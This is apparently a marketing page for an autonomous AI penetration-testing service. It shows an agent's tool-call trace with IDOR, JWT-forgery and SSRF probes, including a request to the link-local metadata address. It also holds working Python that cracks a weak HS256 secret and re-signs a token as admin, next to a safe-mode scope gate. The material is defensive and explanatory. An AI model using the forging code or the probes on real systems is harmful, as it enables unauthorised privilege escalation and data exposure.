Powered by our in-house leading OSS engine
Private release · Zürich, Switzerland

Autonomous AI agents.
Hacking your product.
On contract.

A finding lands in your queue only after the agent re-ran it against your live target. The request, the response, and the full tool trace are in the report.

Outperforms commercial pentest teams on the public XBOW benchmark. Real-world CVEs disclosed via the open-source engine. Read the methodology at docs.pwnkit.com.

Watch the loop

Every finding lands with the trace
that produced it.

A live replay from a recent engagement, redacted. Each row is a tool call the agent issued against the target — the same trace ships in the report under every finding.

live engagement · your-website.com · 16h 22m elapsed
47 traces · 3 findings
14:32:11 http_get /api/users/me 200 · 1.2kB · session ok
14:32:13 cookie_parse session=eyJ1aWQiOjQy... uid=42 role=user
14:32:15 idor_probe /api/users/41 200 · leaked email
14:32:18 idor_probe /api/users/40 200 · leaked email
14:32:21 finding IDOR · /api/users/{id} HIGH · cross-tenant read
14:32:24 http_get /api/admin/audit 403 · forbidden
14:32:27 jwt_decode authorization: bearer ey... alg=HS256 exp=+1h
14:32:30 jwt_resign role=user → role=admin forged · 312 chars
14:32:33 http_get /api/admin/audit 200 · 47kB · accepted
14:32:36 finding BROKEN_AUTH · jwt secret CRITICAL · privilege escalation
14:32:39 dom_xss_test /search?q=<svg/onload=...> reflected · sanitised
14:32:42 sqlmap_probe /api/orders?id=1 parameterised · clean
14:32:45 ssrf_probe image_url=http://169.254... 500 · link-local hit
14:32:48 finding SSRF · image proxy MEDIUM · metadata exposure
14:32:51 http_get /.git/config 404
14:32:54 http_get /api/_internal/health 200 · build=a2f1c
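The jwt_decode, jwt_resign and "accepted" rows above are the whole BROKEN_AUTH finding in three lines: the token's role claim is only as trustworthy as the HS256 secret behind it. The block below is an added illustration of that step, not pwnkit's engine code. It implements HS256 on the standard library (no PyJWT), recovers a constructed weak secret offline from a single captured token, re-signs it with role=admin, and shows the server-side verifier that the forged token then passes; the fixed clock, the secret "secret", the wordlist and the claim values (uid=42, exp=+1h, taken from the trace) are all constructed for the example.

```python
# Added illustration of the jwt_decode -> jwt_resign step in the trace above.
# Not pwnkit code: minimal HS256 on the standard library, a constructed weak
# secret and wordlist, and the verifier checks a server should be running.
import base64
import hashlib
import hmac
import json
import os
from typing import Optional

NOW = 1_700_000_000                  # fixed clock so results are reproducible
WEAK_SECRET = b"secret"              # constructed: the kind of value a wordlist finds
WORDLIST = ["password", "changeme", "secret", "jwt_secret", "s3cr3t"]  # constructed


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def jwt_sign(claims: dict, secret: bytes, alg: str = "HS256") -> str:
    """header.payload.signature; alg is a parameter only so a bogus 'none'
    token can be built for the verifier to reject."""
    header = {"alg": alg, "typ": "JWT"}
    signing_input = (b64url_encode(json.dumps(header, separators=(",", ":")).encode())
                     + "." + b64url_encode(json.dumps(claims, separators=(",", ":")).encode()))
    if alg == "none":
        return signing_input + "."
    mac = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(mac)


def jwt_decode_unverified(token: str) -> dict:
    """The trace's jwt_decode row: read the claims without checking the MAC."""
    return json.loads(b64url_decode(token.split(".")[1]))


def crack_hs256_secret(token: str, wordlist) -> Optional[bytes]:
    """Offline guess: re-MAC header.payload under each candidate and compare.
    Nothing is sent to the target, which is why a guessable secret is fatal."""
    h_b64, p_b64, s_b64 = token.split(".")
    target = b64url_decode(s_b64)
    for cand in wordlist:
        mac = hmac.new(cand.encode(), f"{h_b64}.{p_b64}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(mac, target):
            return cand.encode()
    return None


def jwt_resign(token: str, secret: bytes, **changes) -> str:
    """The trace's jwt_resign row: copy the claims, overwrite some, sign again."""
    return jwt_sign(dict(jwt_decode_unverified(token), **changes), secret)


def jwt_verify(token: str, secret: bytes, now: int = NOW) -> Optional[dict]:
    """Server side: pin alg to HS256 (rejects 'none' and RS256/HS256 confusion),
    compare the MAC in constant time, enforce exp. Returns claims or None."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    h_b64, p_b64, s_b64 = parts
    if json.loads(b64url_decode(h_b64)).get("alg") != "HS256":
        return None
    expected = hmac.new(secret, f"{h_b64}.{p_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s_b64)):
        return None
    claims = json.loads(b64url_decode(p_b64))
    if claims.get("exp", 0) <= now:
        return None
    return claims


def issue_user_token(secret: bytes) -> str:
    """Constructed session token matching the trace: uid=42, role=user, exp=+1h."""
    return jwt_sign({"uid": 42, "role": "user", "exp": NOW + 3600}, secret)


def replay_finding(secret: bytes) -> dict:
    """Decode, recover the secret offline, forge role=admin, and report whether
    the verifier (holding the real secret) would accept the forged token."""
    token = issue_user_token(secret)
    recovered = crack_hs256_secret(token, WORDLIST)
    if recovered is None:
        return {"secret_recovered": False, "forged_accepted": False}
    accepted = jwt_verify(jwt_resign(token, recovered, role="admin"), secret)
    return {"secret_recovered": True,
            "forged_accepted": accepted is not None and accepted.get("role") == "admin"}


if __name__ == "__main__":
    print("weak secret  :", replay_finding(WEAK_SECRET))    # forged token accepted
    print("random secret:", replay_finding(os.urandom(32)))  # wordlist fails, no forgery
```

The verifier is already doing the right things (alg pinning, constant-time compare, exp); the only fix for this finding is the secret itself: 32 or more random bytes from a CSPRNG, rotated, never a dictionary word. Note that the secret recovery needs one captured token and no further requests, so rate limiting on the target does not help.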

What this is not

Four things you
will not get here.

Every head of AppSec has run a PoC that wasted a week. These are the four patterns buyers have learned to distrust — and what we deliberately do instead.

01

Not a self-serve scanner.

No "start free trial" button. No credit-card form. You cannot point a free scanner at your own production estate the morning of an incident, and we know you have tried.

02

Not a chatbot bolted onto a Burp report.

No LLM wrapper around tools you already own. A separate engine with its own methodology and its own audit trail — built to chain a medium IDOR and a medium SSRF into a critical data-exfil path, not to summarise a Nuclei run.

03

Not an SDR-led sales motion.

No discovery call. No qualification call. No deck about what the roadmap might ship next quarter. The first conversation is with the person who will run your first scan.

04

Not a black-box vendor.

The engine is open source. Your security team reads the prompts, tool list, and scoring harness before they trust a single finding. A closed engine ships a number you cannot verify.

How we run

We do not ship
what we cannot defend.

One engagement at a time, reviewed by the person who wrote the engine. No demo deck, no public price list, no shared queues.

01

The operator built the engine.

The person running your scan wrote the code, signs your contract, and answers your team’s follow-up questions in the same thread.

02

Audit trail, not a PDF.

Every action logged with timestamp, prompt, tool call, model version, and outcome — exported in a shape your SOC 2 auditor will actually accept.

03

Safe-mode by default.

Signed scope, action allowlist, and a kill switch you pull from your side. The agent will not issue a destructive call unless your scope explicitly authorises it.
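What a gate of this shape has to check, and in what order, is easier to see in code. The block below is an added example and not pwnkit's implementation: it models a customer-signed scope document (HMAC over a canonical serialisation is an assumption; the engine's real signing scheme is not described on this page), an allowlist of tool names taken from the trace above, a destructive-method rule, and a kill switch the operator flips. The scope fields, the key value and the hostnames are constructed for the example.

```python
# Added illustration of a safe-mode gate: a signed scope, an action allowlist
# and an operator kill switch are checked before each tool call is dispatched.
# Not pwnkit's implementation; scope fields, tool names and the HMAC signature
# are assumptions made for this example.
import fnmatch
import hashlib
import hmac
import json
from dataclasses import dataclass
from typing import Tuple
from urllib.parse import urlparse

# Methods that can change state on the target: refused unless the scope says so.
DESTRUCTIVE_METHODS = {"POST", "PUT", "PATCH", "DELETE"}

# Constructed scope document, as the customer would sign it off.
SCOPE = {
    "engagement": "example-engagement",
    "hosts": ["your-website.com", "*.your-website.com"],
    "tools": ["http_request", "cookie_parse", "idor_probe", "jwt_decode",
              "jwt_resign", "ssrf_probe", "dom_xss_test", "sqlmap_probe"],
    "destructive_ok": False,
}
SCOPE_KEY = b"customer-scope-signing-key"  # constructed; held by the customer


def canonical(doc: dict) -> bytes:
    """Stable serialisation so the signature does not depend on key order."""
    return json.dumps(doc, sort_keys=True, separators=(",", ":")).encode()


def sign_scope(doc: dict, key: bytes) -> str:
    return hmac.new(key, canonical(doc), hashlib.sha256).hexdigest()


def verify_scope(doc: dict, sig: str, key: bytes) -> bool:
    return hmac.compare_digest(sign_scope(doc, key), sig)


class KillSwitch:
    """Flag the customer flips from their side; re-read on every call."""
    def __init__(self) -> None:
        self.pulled = False

    def pull(self) -> None:
        self.pulled = True


@dataclass(frozen=True)
class ToolCall:
    tool: str
    method: str
    url: str


def gate(call: ToolCall, scope: dict, sig: str, key: bytes,
         kill: KillSwitch) -> Tuple[bool, str]:
    """Decide whether a tool call may be dispatched. Order matters: the kill
    switch wins over everything, and a scope that fails its signature check
    authorises nothing, so editing destructive_ok in flight gains nothing."""
    if kill.pulled:
        return False, "kill switch pulled"
    if not verify_scope(scope, sig, key):
        return False, "scope signature invalid"
    host = urlparse(call.url).hostname or ""
    if not any(fnmatch.fnmatchcase(host, pat) for pat in scope["hosts"]):
        return False, f"host out of scope: {host}"
    if call.tool not in scope["tools"]:
        return False, f"tool not allowlisted: {call.tool}"
    if call.method.upper() in DESTRUCTIVE_METHODS and not scope["destructive_ok"]:
        return False, f"destructive {call.method.upper()} not authorised by scope"
    return True, "ok"


def demo() -> dict:
    """Runs the gate over the cases a reviewer would ask about."""
    kill = KillSwitch()
    sig = sign_scope(SCOPE, SCOPE_KEY)
    args = (SCOPE, sig, SCOPE_KEY, kill)
    results = {
        "in_scope_read": gate(ToolCall("http_request", "GET",
                                       "https://your-website.com/api/users/me"), *args),
        "metadata_host": gate(ToolCall("http_request", "GET",
                                       "http://169.254.169.254/latest/meta-data/"), *args),
        "destructive": gate(ToolCall("http_request", "DELETE",
                                     "https://api.your-website.com/api/users/41"), *args),
        "tampered_scope": gate(ToolCall("http_request", "DELETE",
                                        "https://your-website.com/api/users/41"),
                               dict(SCOPE, destructive_ok=True), sig, SCOPE_KEY, kill),
    }
    kill.pull()
    results["after_kill"] = gate(ToolCall("http_request", "GET",
                                          "https://your-website.com/"), *args)
    return results


if __name__ == "__main__":
    for name, (allowed, reason) in demo().items():
        print(f"{name:15} {'ALLOW' if allowed else 'DENY':5} {reason}")
```

One caveat the gate above makes visible: it judges the URL the agent calls, not the URLs the target is induced to fetch. The ssrf_probe row in the trace stays in scope because the request goes to the customer's image proxy; the link-local address only appears as a parameter. Whether that probe is "destructive" is a scope decision, not something a host allowlist can answer.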

04

The engine is open source.

Your security team reads the prompts, tool list, and scoring harness before the first finding lands — not after an incident review.

What it does

Four moves.
One engagement.

For the head of AppSec at a Series C SaaS who already knows the next pentest is six months out. These are the four things the agent actually does.

01 / Schedule

Runs on every deploy, not once a year.

The agent re-attacks your production estate on the cadence you set — on-push, nightly, or the morning before a release — so your next pentest is never six months out.

02 / Chain

Chains findings the way an attacker would.

It maps your auth flow, walks the IDOR into an SSRF into a credential leak, and only reports the chain once it has reproduced the full exploit end to end.

03 / Disclose

Reports written for the auditor who asks.

Each finding ships with the exact request, the exact response, the tool trace, the model version, and a reproduction you can paste into Burp.

04 / Privacy

Single-tenant. Your data is not training data.

One contract, one estate, one isolated runner pool — no cross-customer context, no shared model fine-tuning, deleted on the schedule your contract sets.

FAQ

Questions we answer
before you ask.

The seven questions every CTO and CISO evaluation call ends up at by minute eight. Answered up front so the first call can be about your estate, not ours.

Tell us what you
need to defend.

If your next pentest is six months out and you cannot tell your board why, the form is below. We read every inquiry by hand and reply within one business day — usually with a no, sometimes with a calendar link.